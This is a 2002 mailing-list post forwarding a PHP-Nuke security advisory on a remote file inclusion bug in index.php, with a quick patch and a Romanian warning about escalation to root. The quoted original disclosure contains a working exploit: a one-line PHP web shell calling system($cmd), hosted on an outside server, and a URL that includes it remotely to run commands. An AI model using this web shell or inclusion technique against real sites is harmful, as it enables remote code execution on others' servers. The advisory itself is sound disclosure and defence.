[rlug] [Fwd: [Quick Fix] For "PHP-Nuke allows Command Execution & Much more"]

Thu, 17 Jan 2002 04:22:53 -0800 


-------- Original Message --------
Subject: [Quick Fix] For  "PHP-Nuke allows Command Execution & Much more"
From: "Mihai (Cop) Moldovanu" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>

Quick Fix For PHP Nuke index.php remote file include bug :
Edit index.php and search for this lines:
        include("counter.php");
        include("$file");

and replace them with the following code :

        include("counter.php");
  if (ereg(":", $file)) {
  echo "This bug was fixed ";
  die();
  }
        include("$file");

This fix is pretty simple . if file contains ":" that means it probably
is a remotefile ( ftp://  , http:// ... ) . So simply reject it .

Handle Nopman said:
> Hi All!
>
> I've found a serious security flaw in PHP-Nuke.
> It allows user to execute any PHP code.
>
> The flaw is in the index.php's include file feature.
> It allows including files like index.php?file=file
> It prevents users including ..'s in URL's, but
> it didn't prevent users from entering http://-urls
> Remember the PHP's remote get feature...
>
> How to exploit:
> Upload this file to some free web space provider or
> setup your own server:
> <?php
> system($cmd);
> ?>
> Then just requesting
>
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al>will
 execute ls -al command.
> I will not upload the file anywhere to prevent too easy exploiting. (No
> script kiddies)
>
> Vendor status:
> I contacted the author on 28.12.2001 and he hasn't
> replied.
>
> Sincrely
> "Nopman"
>
>
> --
>
> Powered by Outblaze

-- 
TFM Group - Linux Division ,
Mihai Moldovanu
http://linux.tfm.ro/
http://portal.tfm.ro/
=======================================================

Deci pentru cei care au portale .... fixati-va pachetele .
Sa va zic de ce . Va aduceti aminte de exploiturile locale ? ....
Codul se executa pe masina target ...... Deci exploiturile locale ...
E adevarat ca php-ul de regula se executa ca nobody.nobody ...
Dar daca hackerasul uploadeaza de exemplu exploitul local de sendmail ( e
doar un exemplu ) ... bingo ... remote root . Si parca am vazut destule
portale php-nuke prin .ro .




-- 
SysAdmin ProTv & ProFM
Mihai Moldovanu
http://www.tfm.ro/
http://portal.tfm.ro/



---
Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to 
unsubscribe from this list.

Raspunde prin e-mail lui